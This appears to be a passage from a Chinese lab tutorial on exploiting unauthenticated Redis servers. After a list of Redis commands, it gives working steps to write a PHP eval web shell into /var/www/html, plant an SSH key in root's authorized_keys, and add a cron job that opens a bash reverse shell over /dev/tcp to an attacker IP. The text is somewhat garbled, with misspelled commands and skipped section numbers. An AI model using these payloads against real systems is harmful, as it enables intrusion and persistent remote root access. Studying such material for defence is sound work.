1.查看信息:info
2.删除所有数据库內容:flushable
3.刷新数据库:flush
4.看所有键:KEYS*,使用 select nun可以查看键值数据。
5.设置变量:set test“who am i
6.config set dir dirpath设置路径等配置7.config get dir/filename获取路径及数据配置信息
8.save保存
9.get变量,查看变量名称
然后呢 我这边用另一台机器Redis-kali-2020.4
进行 Redis未授权访问
这边因为Centos7的网卡 问题 淦
我用两台Redis-kali-2020.4进行未授权测试一下
可以看到 直接就进来了
0x03 Redis写入webshell
既然进来了嘛
config set dir /var/www/html/
//切换目录到网站的根目录
set x "\n\n\n<?php phpinfo();?>\n\n\n"
//写入恶意代码phpinfo()
set xx "\n\n\n<?php @eval($_POST['1']);?>\n\n\n"
//写入一句话木马
config set dbfilename a001.php
//磁盘中生成木马文件a001.php
save
//进行保存
cat key.txt | redis-cli -h 192.168.3.26 --pass 123456 -x set xxx
--pass是登录密码 无密码可不填
redis-cli -h 192.168.3.26 config set dir /root/.ssh
redis-cli -h 192.168.3.26 config set dbfilename authorized_keys
redis-cli -h 192.168.3.26 save
ssh -i id_rsa root@192.168.3.26
0x05 利用计划任务反弹shell
nc开启监听
nc -lvnp 6666
写入一句话
192.168.175.162:6379> set xx "\n* * * * * bash -i >& /dev/tcp/192.168.175.161/9999 0>&1\n" #星号代表计划任务执行的时间
OK
192.168.175.162:6379> config set dir /var/spool/cron/ #设置导出的路径
OK
192.168.175.162:6379> config set dbfilename root #设置导出的文件名
OK
192.168.175.162:6379> save #保存
OK
192.168.175.162:6379>
或者这样也是可以的
┌──(root/kali)-[~/桌面/redis-3.2.0/src]
└─# echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.175.161/9999 0>&1\n\n"|./redis-cli -h 192.168.175.162 -a a001 -x set 1
./redis-cli -h 192.168.175.162 -a a001 config set dir /var/spool/cron/
./redis-cli -h 192.168.175.162 -a a001 config set dbfilename root
./redis-cli -h 192.168.175.162 -a a001 save
OK
OK
OK
OK